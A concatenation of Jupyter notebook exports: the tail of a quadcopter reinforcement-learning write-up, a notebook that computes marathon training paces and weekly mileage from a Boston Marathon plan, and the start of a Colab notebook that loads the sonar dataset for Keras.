# In case of the critic class I also created a neural network, this time with 3 fully connected hidden layers (same architecture was defined for state and action pathways) with 32, 64 and 128 units. For every layer I've used batch normalization, ReLU activation function and dropout (with probability equal to 0.5). The implementation was similar to the one for the NN in the actor class.
# **Question 3**: Using the episode rewards plot, discuss how the agent learned over time.
#
# - Was it an easy task to learn or hard?
# - Was there a gradual learning curve, or an aha moment?
# - How good was the final performance of the agent? (e.g. mean rewards over the last 10 episodes)
#
# **Answer**: From what I can see in the plot it wasn't easy to learn that task. On many attempts I've got a lot of spikes/drops on the total reward plot which makes me think that there has to be an 'aha' moment for the agent. Additionally those spikes make it hard to observe gradual learning curve if such exists.
# **Question 4**: Briefly summarize your experience working on this project. You can use the following prompts for ideas.
#
# - What was the hardest part of the project? (e.g. getting started, plotting, specifying the task, etc.)
# - Did you find anything interesting in how the quadcopter or your agent behaved?
#
# **Answer**: It was quite difficult to figure out how to start the implementation - the provided suggestions and starter code were really helpful.
# The surprising thing about the training process was that the total-reward plot showed many spikes and drops, and I could not always see a gradual improvement - this also caused some problems, as I wasn't sure whether the program needed more time to train or whether there was a problem in the implementation.
| 17,330 |
/qualitative_clustering_analysis/smba_quantitative_clustering_analysis.ipynb
|
6078c0c4f86974f02aaf189310141a0a58b03fb4
|
[] |
no_license
|
zhihanyang2022/GMVAE
|
https://github.com/zhihanyang2022/GMVAE
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 190,701 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Metis - Beginner Python & Math for Data Science project
#
# ## Run Like a Hobbit
#
# As a runner, [Marathon Maniac](https://www.marathonmaniacs.com/)/[Half Fanatic](https://www.halffanatics.com/)/[Double Agent](https://www.marathonmaniacs.com/double-agent-criteria) and [RRCA](https://www.rrca.org/) coach, I'm always looking for more information about and better answers to the following questions in order to continue improving/achieving my goals, avoiding overtraining and injury and having fun...
#
# * How much work (i.e. Time, effort (or how fast I have to run during each part of a training plan) and distance) is required to achieve a particular distance/time goal?
# * How much of the required work did I complete and how close was I to the prescribed level of effort (keeping in mind that runners should avoid training harder than they need to as this can lead to overtraining and injury)?
# * Under what conditions did I train (Data such as heart rate and other temporal and environmental variables can be tracked)?
# * Did I achieve the goal I trained for? If not, how much did I miss it by?
# * Can I achieve the same goal with less work?... Or, how much and how fast can I increase my training intensity/improve while avoiding overtraining and injury?
# +
# https://stackoverflow.com/questions/6808064/parsing-hhmm-in-python
# https://docs.python.org/3/library/time.html
import time
def time_in_minutes(time_str):
    """Parse an "H:MM:SS" (or "MM:SS") string and return the total minutes.

    Seconds contribute fractionally, e.g. "0:07:30" -> 7.5.
    """
    try:
        parsed = time.strptime(time_str, "%H:%M:%S")
    except ValueError:
        # No hours field present: re-parse as minutes and seconds only.
        parsed = time.strptime(time_str, "%M:%S")
    return parsed.tm_hour * 60 + parsed.tm_min + parsed.tm_sec / 60
def minutes_in_seconds(time_str):
    """Parse an "MM:SS" string and return the total number of seconds."""
    parsed = time.strptime(time_str, "%M:%S")
    return 60 * parsed.tm_min + parsed.tm_sec
# Example/test values
goal_time = "3:45:00"
pace_per_mile_5K = "7:25"
goal_time_minutes = time_in_minutes(goal_time)
pace_per_mile_5K_minutes = time_in_minutes(pace_per_mile_5K)
print("- Goal time (Minutes): {}".format(goal_time_minutes))
print("- 5K interval pace (Minutes/mile): {}".format(pace_per_mile_5K_minutes))
# To round the result to two decimal places...
#
# https://mkaz.blog/code/python-string-format-cookbook/
# format_2_decimal_places = "{:.2f}"
# print("- Goal time (Minutes/mile rounded to two decimal places): {}".format(format_2_decimal_places.format(pace_per_mile_5K_minutes)))
pace_per_mile_5K_seconds = minutes_in_seconds(pace_per_mile_5K)
print("- 5K interval pace (Seconds/mile): {}".format(pace_per_mile_5K_seconds))
# +
# http://lmgtfy.com/?q=miles+to+kilometers
seconds_per_km = pace_per_mile_5K_seconds / 1.60934
meters_per_second = 1000 / seconds_per_km
print("- Seconds per kilometer: {}".format(seconds_per_km))
print("- Meters per second: {}".format(meters_per_second))
def seconds_per_km(meters_per_second):
    """Seconds needed to cover one kilometre at the given speed (metres/second)."""
    return 1000 / meters_per_second


def seconds_per_mile(meters_per_second):
    """Seconds needed to cover one mile at the given speed (metres/second).

    One mile is 1.60934 kilometres, i.e. 1000 * 1.60934 metres.
    """
    return (1000 * 1.60934) / meters_per_second
print("- Seconds per kilometer (assuming a speed of {} m/s): {}".format(meters_per_second, seconds_per_km(meters_per_second)))
print("- Seconds per mile (assuming a speed of {} m/s): {}".format(meters_per_second, seconds_per_mile(meters_per_second)))
# +
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.ticker
# +
# https://www.baa.org/races/boston-marathon/enter/boston-marathon-training
pace_chart = pd.read_json('./pace-chart.json', orient='columns')
pace_chart.columns = \
['2:45:00', '3:00:00', '3:15:00', '3:30:00', '3:45:00', '4:00:00', '4:15:00', '4:30:00', '4:45:00', '5:00:00']
pace_chart = \
pace_chart.reindex(['5K Interval Pace', '10K Interval Pace', 'Half Marathon Pace', 'Marathon Pace', 'Easy Runs', 'Aerobic Runs'])
pace_chart
# +
pace_chart_seconds = pace_chart.applymap(lambda x: minutes_in_seconds(x))
pace_chart_seconds
# +
# Since the plot was initially too small...
#
# Get and print the plot's current/default size
# plot_size = plt.rcParams[ 'figure.figsize' ]
# print("Plot size: {}".format(plot_size))
# Make the plot bigger
plt.rcParams['figure.figsize'] = [18, 12]
ax = plt.gca()
# https://stackoverflow.com/questions/40395227/minute-and-second-format-for-x-label-of-matplotlib
formatter = \
matplotlib.ticker.FuncFormatter(lambda seconds, pos: time.strftime('%M:%S', time.gmtime(seconds)))
ax.yaxis.set_major_formatter(formatter)
plt.plot('2:45:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.plot('3:00:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.plot('3:15:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.plot('3:30:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.plot('3:45:00', data=pace_chart_seconds, linestyle='dashed', linewidth=3, marker='o', markersize=8)
plt.plot('4:00:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.plot('4:15:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.plot('4:30:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.plot('4:45:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.plot('5:00:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.title("Average required pace for the plan training paces", fontsize=18, fontweight='bold')
plt.xlabel('Training pace', fontsize=14, fontweight='bold')
plt.ylabel('Minutes/mile', fontsize=14, fontweight='bold')
plt.legend()
plt.show()
# +
# Some attempts at getting a DataFrame's row...
# Both of the following examples return a particular row
# row_1 = normalized_pace_chart.iloc[0,]
# print('-- Row ({}) --'.format(type(row_1)))
# print(row_1)
# row_2 = normalized_pace_chart.iloc[:1]
# print('-- Row ({}) --'.format(type(row_2)))
# print(row_2)
# 4 = 3:45:00 goal time
GOAL_TIME = 4
goal_time_paces = pace_chart_seconds.iloc[:,GOAL_TIME]
print('---- Training paces per mile (in seconds) for a 3:45:00 goal time ({}) ----'.format(type(goal_time_paces)))
print(goal_time_paces)
training_pace_5K = goal_time_paces[0]
print('\n- 5K training pace (in seconds) for a 3:45:00 goal time (Type: {}): {}'.format(type(training_pace_5K), training_pace_5K))
# +
import datetime
plan = pd.read_json('./plan-baa-2019-level-4.json', orient='columns')
plan = \
plan.reindex(['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday'])
# TODO
# print(type(plan.iloc[:1,0]))
# print(type(plan.iloc[:1,0][0]['segments'][0]['distanceMin']))
# -- Constants --
# Distance unit codes used by the `units` / `result_units` arguments below.
DISTANCE_METERS = 0
DISTANCE_KMS = 1
DISTANCE_MILES = 2
# ---- Activity segments ----
# JSON keys describing one segment of a day's workout in the plan file.
KEY_SEGMENTS = 'segments'
KEY_DURATION = 'duration'
KEY_PACE = 'pace'
KEY_DISTANCE_MIN = 'distanceMin'
KEY_DISTANCE_MAX = 'distanceMax'
KEY_UNITS = 'units'
# ---- Repeats ----
# JSON keys describing interval repeats (work / rest / recover parts).
KEY_REPEAT = 'repeat'
KEY_WORK = 'work'
KEY_REST = 'rest'
KEY_RECOVER = 'recover'
# TODO: Use KEY_DISTANCE_MIN instead?
KEY_DISTANCE = 'distance'
print('---- Goal time paces (Seconds/mile) ----')
print(goal_time_paces)
def distance(cell, goal_time_paces, distance_key = KEY_DISTANCE_MIN, result_units = DISTANCE_MILES):
    """Total distance (in miles, rounded to 5 places) prescribed by one day's cell.

    Each segment contributes, in priority order: its requested distance key
    (min or max), the minimum distance as a fallback, the distance implied by
    a duration at the prescribed pace, or the expansion of a repeat block.
    """
    total = 0
    # Missing 'segments' key, None, or an empty list all mean a zero-mileage day.
    for segment in cell.get(KEY_SEGMENTS) or []:
        keys = segment.keys()
        if distance_key in keys:
            total += segment[distance_key]
        elif KEY_DISTANCE_MIN in keys:
            # Requested key (e.g. the maximum) absent: fall back to the minimum.
            total += segment[KEY_DISTANCE_MIN]
        elif KEY_DURATION in keys:
            # Duration-based segment: convert time at the prescribed pace to miles.
            total += distance_covered(segment[KEY_DURATION], goal_time_paces[segment[KEY_PACE]])
        elif KEY_REPEAT in keys:
            total += repeat_distance(segment, goal_time_paces, result_units)
    return round(float(total), 5)
def repeat_distance(segment, goal_time_paces, result_units):
    """Total distance (miles, rounded to 6 places) of a repeat segment.

    The work part (and, when present, the recovery part) contributes either
    its explicit distance or the distance covered during its duration at the
    prescribed pace, multiplied by the repeat count.
    """
    repeat = segment[KEY_REPEAT]
    work = segment[KEY_WORK]
    # TODO
    # NOTE(review): `rest` is extracted below but never used in the total —
    # presumably rest periods are standing/walking and add no distance; confirm.
    rest = None
    # Repeat distance is calculated in one of two ways:
    #
    # - If a `work` and/or `recover` part's `distance` is specified, multiply its value by
    #   `repeat` and add the result to the segment's total
    # - If a `work` and/or `recover` part's `duration` is specified (and it's `distance`
    #   isn't), add the distance covered during the specified duration given the specified
    #   pace, multiply its value by `repeat` and add the result to the segment's total
    result = 0
    result += distance_from_distance_or_duration(work, goal_time_paces[work[KEY_PACE]], repeat)
    # Repeats may or may not include rest periods between the work and recovery periods
    if KEY_REST in segment.keys():
        rest = segment[KEY_REST]
    # Repeats may or may not also include recovery periods
    if KEY_RECOVER in segment.keys():
        recover = segment[KEY_RECOVER]
        # NOTE(review): the recovery part is priced at the *work* part's pace
        # (goal_time_paces[work[KEY_PACE]]); if recover parts carry their own
        # pace key this should probably use it — verify against the plan JSON.
        result += distance_from_distance_or_duration(recover, goal_time_paces[work[KEY_PACE]], repeat)
    return round(result, 6)
def distance_from_distance_or_duration(part, seconds_per_mile, repeat, result_units = DISTANCE_MILES):
    """Distance contributed by one repeat part, in *result_units*.

    If the part carries an explicit distance, it is repeated and converted to
    the requested units; otherwise the part's duration at *seconds_per_mile*
    determines the distance.
    """
    if KEY_DISTANCE in part:
        raw_distance = part[KEY_DISTANCE]
        units = part[KEY_UNITS]
        # A part's distance may be given in metres (e.g. 400 m repeats);
        # divide by the conversion factor only when units differ.
        divisor = 1 if units == result_units else get_unit_converter(units, result_units)
        return (raw_distance * repeat) / divisor
    return distance_covered(part[KEY_DURATION], seconds_per_mile, repeat)
def duration(cell, goal_time_paces, distance_key = KEY_DISTANCE_MIN):
    """Total prescribed duration (in seconds) for one day's cell of the plan.

    Distance-based segments contribute distance (miles) * pace (seconds/mile);
    duration-based segments contribute their duration directly.
    """
    result = 0
    # Missing 'segments' key, None, or an empty list all mean a zero-duration day.
    segments = cell.get(KEY_SEGMENTS) if KEY_SEGMENTS in cell.keys() else None
    if not segments:
        return result
    for segment in segments:
        keys = segment.keys()
        if KEY_PACE not in keys:
            # TODO: repeat segments carry their pace inside the 'work'/'recover'
            # parts and are not yet counted here.
            continue
        if distance_key in keys:
            # miles * seconds-per-mile -> seconds
            result += segment[distance_key] * goal_time_paces[segment[KEY_PACE]]
        elif KEY_DURATION in keys:
            # Bug fix: the segment's duration is already expressed in seconds.
            # The previous code added distance_covered(...) here, which returns
            # *miles*, silently mixing units into a seconds total.
            result += segment[KEY_DURATION]
    return result
def get_unit_converter(units, result_units):
    """Return the divisor that converts a distance in *units* into *result_units*.

    The caller divides a distance expressed in *units* by the returned factor.

    Raises:
        ValueError: if the (units, result_units) pair is not supported.
    """
    # Meters to miles - http://bfy.tw/NCEZ
    if units == DISTANCE_METERS and result_units == DISTANCE_MILES:
        return 1609.344
    # Kilometers to miles
    elif units == DISTANCE_KMS and result_units == DISTANCE_MILES:
        return 1.609
    # Previously this fell through and implicitly returned None, which made the
    # caller fail later with an opaque TypeError on division; fail fast with a
    # clear message instead.
    raise ValueError(
        "Unsupported unit conversion: {} -> {}".format(units, result_units))
def distance_covered(duration, pace, repeat = 1):
    """Miles covered by *repeat* efforts of *duration* seconds at *pace* seconds/mile.

    Example: a 300-second (5-minute) effort at 500 seconds per mile covers
    300 / 500 = 0.6 miles; two such efforts cover 1.2 miles.
    """
    miles_per_effort = duration / pace
    return miles_per_effort * repeat
# https://stackoverflow.com/questions/39475978/apply-function-to-each-cell-in-dataframe
# Per-day minimum prescribed distance for every cell of the plan.
distance_min = plan.applymap(lambda x: distance(x, goal_time_paces))
print('\n---- Weekly distance ----')
print('-- Minimum --')
print(distance_min)
print('-- Totals/week (Minimum) --')
print(distance_min.sum())

# Same, but preferring each segment's maximum distance when one is given.
distance_max = plan.applymap(lambda x: distance(x, goal_time_paces, KEY_DISTANCE_MAX))
print('\n-- Maximum --')
print(distance_max)
print('-- Totals/week (Maximum) --')
print(distance_max.sum())

# NOTE(review): this rebinds the name `duration` from the function to a
# DataFrame, shadowing the function for the rest of the notebook — confirm the
# function is not needed again afterwards.
duration = plan.applymap(lambda x: duration(x, goal_time_paces))
print('\n---- Weekly duration ----')
print(duration)
# +
# https://python-graph-gallery.com/11-grouped-barplot/
bar_width = 0.2
# The position of the bars on the x axis
#
# Return evenly spaced values within a given interval
range_distance_min = np.arange(len(distance_min.sum()))
range_distance_max = [x + bar_width for x in range_distance_min]
plt.bar(range_distance_min, distance_min.sum(), width=bar_width, edgecolor='white', label='Min distance')
plt.bar(range_distance_max, distance_max.sum(), width=bar_width, edgecolor='white', label='Max distance')
plt.xlabel('Week', fontweight='bold')
# Add the xticks in the middle of the group bars
plt.xticks([r + bar_width for r in range(len(range_distance_min))], [1, 2, 3, 4])
plt.ylabel('Miles', fontweight='bold')
# Create the legend and show the graph
plt.legend()
plt.show()
# -
| 13,863 |
/src/DistintosAlgoritmos/parameterTunningAdaBoost.ipynb
|
068a63f1bd5bab6fd3a4882ecea1dfbccd24a412
|
[] |
no_license
|
sebalogue/tp2-datos
|
https://github.com/sebalogue/tp2-datos
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 10,540 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + id="xnRlapMeliF-" colab_type="code" outputId="07ae3ee3-2c34-4881-8c0e-b76d900751ca" colab={"resources": {"http://localhost:8080/nbextensions/google.colab/files.js": {"data": "Ly8gQ29weXJpZ2h0IDIwMTcgR29vZ2xlIExMQwovLwovLyBMaWNlbnNlZCB1bmRlciB0aGUgQXBhY2hlIExpY2Vuc2UsIFZlcnNpb24gMi4wICh0aGUgIkxpY2Vuc2UiKTsKLy8geW91IG1heSBub3QgdXNlIHRoaXMgZmlsZSBleGNlcHQgaW4gY29tcGxpYW5jZSB3aXRoIHRoZSBMaWNlbnNlLgovLyBZb3UgbWF5IG9idGFpbiBhIGNvcHkgb2YgdGhlIExpY2Vuc2UgYXQKLy8KLy8gICAgICBodHRwOi8vd3d3LmFwYWNoZS5vcmcvbGljZW5zZXMvTElDRU5TRS0yLjAKLy8KLy8gVW5sZXNzIHJlcXVpcmVkIGJ5IGFwcGxpY2FibGUgbGF3IG9yIGFncmVlZCB0byBpbiB3cml0aW5nLCBzb2Z0d2FyZQovLyBkaXN0cmlidXRlZCB1bmRlciB0aGUgTGljZW5zZSBpcyBkaXN0cmlidXRlZCBvbiBhbiAiQVMgSVMiIEJBU0lTLAovLyBXSVRIT1VUIFdBUlJBTlRJRVMgT1IgQ09ORElUSU9OUyBPRiBBTlkgS0lORCwgZWl0aGVyIGV4cHJlc3Mgb3IgaW1wbGllZC4KLy8gU2VlIHRoZSBMaWNlbnNlIGZvciB0aGUgc3BlY2lmaWMgbGFuZ3VhZ2UgZ292ZXJuaW5nIHBlcm1pc3Npb25zIGFuZAovLyBsaW1pdGF0aW9ucyB1bmRlciB0aGUgTGljZW5zZS4KCi8qKgogKiBAZmlsZW92ZXJ2aWV3IEhlbHBlcnMgZm9yIGdvb2dsZS5jb2xhYiBQeXRob24gbW9kdWxlLgogKi8KKGZ1bmN0aW9uKHNjb3BlKSB7CmZ1bmN0aW9uIHNwYW4odGV4dCwgc3R5bGVBdHRyaWJ1dGVzID0ge30pIHsKICBjb25zdCBlbGVtZW50ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc3BhbicpOwogIGVsZW1lbnQudGV4dENvbnRlbnQgPSB0ZXh0OwogIGZvciAoY29uc3Qga2V5IG9mIE9iamVjdC5rZXlzKHN0eWxlQXR0cmlidXRlcykpIHsKICAgIGVsZW1lbnQuc3R5bGVba2V5XSA9IHN0eWxlQXR0cmlidXRlc1trZXldOwogIH0KICByZXR1cm4gZWxlbWVudDsKfQoKLy8gTWF4IG51bWJlciBvZiBieXRlcyB3aGljaCB3aWxsIGJlIHVwbG9hZGVkIGF0IGEgdGltZS4KY29uc3QgTUFYX1BBWUxPQURfU0laRSA9IDEwMCAqIDEwMjQ7Ci8vIE1heCBhbW91bnQgb2YgdGltZSB0byBibG9jayB3YWl0aW5nIGZvciB0aGUgdXNlci4KY29uc3QgRklMRV9DSEFOR0VfVElNRU9VVF9NUyA9IDMwICogMTAwMDsKCmZ1bmN0aW9uIF91cGxvYWRGaWxlcyhpbnB1dElkLCBvdXRwdXRJZCkgewogIGNvbnN0IHN0ZXBzID0gdXBsb2FkRmlsZXNTdGVwKGlucHV0SWQsIG91dHB1dElkKTsKICBjb25zdCBvdXRwdXRFbGVtZW50ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQob3V0cHV0SWQpOwogIC8vIENhY2hlIHN0ZXBzIG9uIHRoZSBvdXRwdXRFbGVtZW50IHRvIG1ha2UgaXQgYXZhaWxhYmxlIGZvciB0aGUgbmV4dCBjYWxsCiAgLy8gdG8gdXBsb2FkRmlsZXNDb250a
W51ZSBmcm9tIFB5dGhvbi4KICBvdXRwdXRFbGVtZW50LnN0ZXBzID0gc3RlcHM7CgogIHJldHVybiBfdXBsb2FkRmlsZXNDb250aW51ZShvdXRwdXRJZCk7Cn0KCi8vIFRoaXMgaXMgcm91Z2hseSBhbiBhc3luYyBnZW5lcmF0b3IgKG5vdCBzdXBwb3J0ZWQgaW4gdGhlIGJyb3dzZXIgeWV0KSwKLy8gd2hlcmUgdGhlcmUgYXJlIG11bHRpcGxlIGFzeW5jaHJvbm91cyBzdGVwcyBhbmQgdGhlIFB5dGhvbiBzaWRlIGlzIGdvaW5nCi8vIHRvIHBvbGwgZm9yIGNvbXBsZXRpb24gb2YgZWFjaCBzdGVwLgovLyBUaGlzIHVzZXMgYSBQcm9taXNlIHRvIGJsb2NrIHRoZSBweXRob24gc2lkZSBvbiBjb21wbGV0aW9uIG9mIGVhY2ggc3RlcCwKLy8gdGhlbiBwYXNzZXMgdGhlIHJlc3VsdCBvZiB0aGUgcHJldmlvdXMgc3RlcCBhcyB0aGUgaW5wdXQgdG8gdGhlIG5leHQgc3RlcC4KZnVuY3Rpb24gX3VwbG9hZEZpbGVzQ29udGludWUob3V0cHV0SWQpIHsKICBjb25zdCBvdXRwdXRFbGVtZW50ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQob3V0cHV0SWQpOwogIGNvbnN0IHN0ZXBzID0gb3V0cHV0RWxlbWVudC5zdGVwczsKCiAgY29uc3QgbmV4dCA9IHN0ZXBzLm5leHQob3V0cHV0RWxlbWVudC5sYXN0UHJvbWlzZVZhbHVlKTsKICByZXR1cm4gUHJvbWlzZS5yZXNvbHZlKG5leHQudmFsdWUucHJvbWlzZSkudGhlbigodmFsdWUpID0+IHsKICAgIC8vIENhY2hlIHRoZSBsYXN0IHByb21pc2UgdmFsdWUgdG8gbWFrZSBpdCBhdmFpbGFibGUgdG8gdGhlIG5leHQKICAgIC8vIHN0ZXAgb2YgdGhlIGdlbmVyYXRvci4KICAgIG91dHB1dEVsZW1lbnQubGFzdFByb21pc2VWYWx1ZSA9IHZhbHVlOwogICAgcmV0dXJuIG5leHQudmFsdWUucmVzcG9uc2U7CiAgfSk7Cn0KCi8qKgogKiBHZW5lcmF0b3IgZnVuY3Rpb24gd2hpY2ggaXMgY2FsbGVkIGJldHdlZW4gZWFjaCBhc3luYyBzdGVwIG9mIHRoZSB1cGxvYWQKICogcHJvY2Vzcy4KICogQHBhcmFtIHtzdHJpbmd9IGlucHV0SWQgRWxlbWVudCBJRCBvZiB0aGUgaW5wdXQgZmlsZSBwaWNrZXIgZWxlbWVudC4KICogQHBhcmFtIHtzdHJpbmd9IG91dHB1dElkIEVsZW1lbnQgSUQgb2YgdGhlIG91dHB1dCBkaXNwbGF5LgogKiBAcmV0dXJuIHshSXRlcmFibGU8IU9iamVjdD59IEl0ZXJhYmxlIG9mIG5leHQgc3RlcHMuCiAqLwpmdW5jdGlvbiogdXBsb2FkRmlsZXNTdGVwKGlucHV0SWQsIG91dHB1dElkKSB7CiAgY29uc3QgaW5wdXRFbGVtZW50ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoaW5wdXRJZCk7CiAgaW5wdXRFbGVtZW50LmRpc2FibGVkID0gZmFsc2U7CgogIGNvbnN0IG91dHB1dEVsZW1lbnQgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZChvdXRwdXRJZCk7CiAgb3V0cHV0RWxlbWVudC5pbm5lckhUTUwgPSAnJzsKCiAgY29uc3QgcGlja2VkUHJvbWlzZSA9IG5ldyBQcm9taXNlKChyZXNvbHZlKSA9PiB7CiAgICBpbnB1dEVsZW1lbnQuYWRkRXZlbnRMaXN0ZW5lcignY2hhbmdlJywgKGUpID0+I
HsKICAgICAgcmVzb2x2ZShlLnRhcmdldC5maWxlcyk7CiAgICB9KTsKICB9KTsKCiAgY29uc3QgY2FuY2VsID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnYnV0dG9uJyk7CiAgaW5wdXRFbGVtZW50LnBhcmVudEVsZW1lbnQuYXBwZW5kQ2hpbGQoY2FuY2VsKTsKICBjYW5jZWwudGV4dENvbnRlbnQgPSAnQ2FuY2VsIHVwbG9hZCc7CiAgY29uc3QgY2FuY2VsUHJvbWlzZSA9IG5ldyBQcm9taXNlKChyZXNvbHZlKSA9PiB7CiAgICBjYW5jZWwub25jbGljayA9ICgpID0+IHsKICAgICAgcmVzb2x2ZShudWxsKTsKICAgIH07CiAgfSk7CgogIC8vIENhbmNlbCB1cGxvYWQgaWYgdXNlciBoYXNuJ3QgcGlja2VkIGFueXRoaW5nIGluIHRpbWVvdXQuCiAgY29uc3QgdGltZW91dFByb21pc2UgPSBuZXcgUHJvbWlzZSgocmVzb2x2ZSkgPT4gewogICAgc2V0VGltZW91dCgoKSA9PiB7CiAgICAgIHJlc29sdmUobnVsbCk7CiAgICB9LCBGSUxFX0NIQU5HRV9USU1FT1VUX01TKTsKICB9KTsKCiAgLy8gV2FpdCBmb3IgdGhlIHVzZXIgdG8gcGljayB0aGUgZmlsZXMuCiAgY29uc3QgZmlsZXMgPSB5aWVsZCB7CiAgICBwcm9taXNlOiBQcm9taXNlLnJhY2UoW3BpY2tlZFByb21pc2UsIHRpbWVvdXRQcm9taXNlLCBjYW5jZWxQcm9taXNlXSksCiAgICByZXNwb25zZTogewogICAgICBhY3Rpb246ICdzdGFydGluZycsCiAgICB9CiAgfTsKCiAgaWYgKCFmaWxlcykgewogICAgcmV0dXJuIHsKICAgICAgcmVzcG9uc2U6IHsKICAgICAgICBhY3Rpb246ICdjb21wbGV0ZScsCiAgICAgIH0KICAgIH07CiAgfQoKICBjYW5jZWwucmVtb3ZlKCk7CgogIC8vIERpc2FibGUgdGhlIGlucHV0IGVsZW1lbnQgc2luY2UgZnVydGhlciBwaWNrcyBhcmUgbm90IGFsbG93ZWQuCiAgaW5wdXRFbGVtZW50LmRpc2FibGVkID0gdHJ1ZTsKCiAgZm9yIChjb25zdCBmaWxlIG9mIGZpbGVzKSB7CiAgICBjb25zdCBsaSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2xpJyk7CiAgICBsaS5hcHBlbmQoc3BhbihmaWxlLm5hbWUsIHtmb250V2VpZ2h0OiAnYm9sZCd9KSk7CiAgICBsaS5hcHBlbmQoc3BhbigKICAgICAgICBgKCR7ZmlsZS50eXBlIHx8ICduL2EnfSkgLSAke2ZpbGUuc2l6ZX0gYnl0ZXMsIGAgKwogICAgICAgIGBsYXN0IG1vZGlmaWVkOiAkewogICAgICAgICAgICBmaWxlLmxhc3RNb2RpZmllZERhdGUgPyBmaWxlLmxhc3RNb2RpZmllZERhdGUudG9Mb2NhbGVEYXRlU3RyaW5nKCkgOgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnbi9hJ30gLSBgKSk7CiAgICBjb25zdCBwZXJjZW50ID0gc3BhbignMCUgZG9uZScpOwogICAgbGkuYXBwZW5kQ2hpbGQocGVyY2VudCk7CgogICAgb3V0cHV0RWxlbWVudC5hcHBlbmRDaGlsZChsaSk7CgogICAgY29uc3QgZmlsZURhdGFQcm9taXNlID0gbmV3IFByb21pc2UoKHJlc29sdmUpID0+IHsKICAgICAgY29uc3QgcmVhZGVyID0gbmV3IEZpbGVSZWFkZXIoKTsKICAgICAgcmVhZGVyLm9ubG9hZCA9IChlK
SA9PiB7CiAgICAgICAgcmVzb2x2ZShlLnRhcmdldC5yZXN1bHQpOwogICAgICB9OwogICAgICByZWFkZXIucmVhZEFzQXJyYXlCdWZmZXIoZmlsZSk7CiAgICB9KTsKICAgIC8vIFdhaXQgZm9yIHRoZSBkYXRhIHRvIGJlIHJlYWR5LgogICAgbGV0IGZpbGVEYXRhID0geWllbGQgewogICAgICBwcm9taXNlOiBmaWxlRGF0YVByb21pc2UsCiAgICAgIHJlc3BvbnNlOiB7CiAgICAgICAgYWN0aW9uOiAnY29udGludWUnLAogICAgICB9CiAgICB9OwoKICAgIC8vIFVzZSBhIGNodW5rZWQgc2VuZGluZyB0byBhdm9pZCBtZXNzYWdlIHNpemUgbGltaXRzLiBTZWUgYi82MjExNTY2MC4KICAgIGxldCBwb3NpdGlvbiA9IDA7CiAgICB3aGlsZSAocG9zaXRpb24gPCBmaWxlRGF0YS5ieXRlTGVuZ3RoKSB7CiAgICAgIGNvbnN0IGxlbmd0aCA9IE1hdGgubWluKGZpbGVEYXRhLmJ5dGVMZW5ndGggLSBwb3NpdGlvbiwgTUFYX1BBWUxPQURfU0laRSk7CiAgICAgIGNvbnN0IGNodW5rID0gbmV3IFVpbnQ4QXJyYXkoZmlsZURhdGEsIHBvc2l0aW9uLCBsZW5ndGgpOwogICAgICBwb3NpdGlvbiArPSBsZW5ndGg7CgogICAgICBjb25zdCBiYXNlNjQgPSBidG9hKFN0cmluZy5mcm9tQ2hhckNvZGUuYXBwbHkobnVsbCwgY2h1bmspKTsKICAgICAgeWllbGQgewogICAgICAgIHJlc3BvbnNlOiB7CiAgICAgICAgICBhY3Rpb246ICdhcHBlbmQnLAogICAgICAgICAgZmlsZTogZmlsZS5uYW1lLAogICAgICAgICAgZGF0YTogYmFzZTY0LAogICAgICAgIH0sCiAgICAgIH07CiAgICAgIHBlcmNlbnQudGV4dENvbnRlbnQgPQogICAgICAgICAgYCR7TWF0aC5yb3VuZCgocG9zaXRpb24gLyBmaWxlRGF0YS5ieXRlTGVuZ3RoKSAqIDEwMCl9JSBkb25lYDsKICAgIH0KICB9CgogIC8vIEFsbCBkb25lLgogIHlpZWxkIHsKICAgIHJlc3BvbnNlOiB7CiAgICAgIGFjdGlvbjogJ2NvbXBsZXRlJywKICAgIH0KICB9Owp9CgpzY29wZS5nb29nbGUgPSBzY29wZS5nb29nbGUgfHwge307CnNjb3BlLmdvb2dsZS5jb2xhYiA9IHNjb3BlLmdvb2dsZS5jb2xhYiB8fCB7fTsKc2NvcGUuZ29vZ2xlLmNvbGFiLl9maWxlcyA9IHsKICBfdXBsb2FkRmlsZXMsCiAgX3VwbG9hZEZpbGVzQ29udGludWUsCn07Cn0pKHNlbGYpOwo=", "ok": true, "headers": [["content-type", "application/javascript"]], "status": 200.0, "status_text": ""}}, "base_uri": "https://localhost:8080/", "height": 89.0}
# Colab environment setup: confirm GPU availability and pull in the sonar
# dataset via an interactive file upload.
import tensorflow as tf
# Empty string here means no GPU is attached to the runtime.
device_name = tf.test.gpu_device_name()
import keras
from google.colab import files
# Opens the Colab file picker; the user is expected to upload 'sonar.csv'.
uploaded = files.upload()
import pandas as pd
import io
# Sonar dataset has no header row: 60 numeric feature columns + 1 label column.
dataframe = pd.read_csv('sonar.csv', header=None)
# + id="2EJdV_7Cl9_J" colab_type="code" colab={}
import numpy
import pandas
from keras.models import Sequential
from keras.layers import Dense
from keras.wrappers.scikit_learn import KerasClassifier
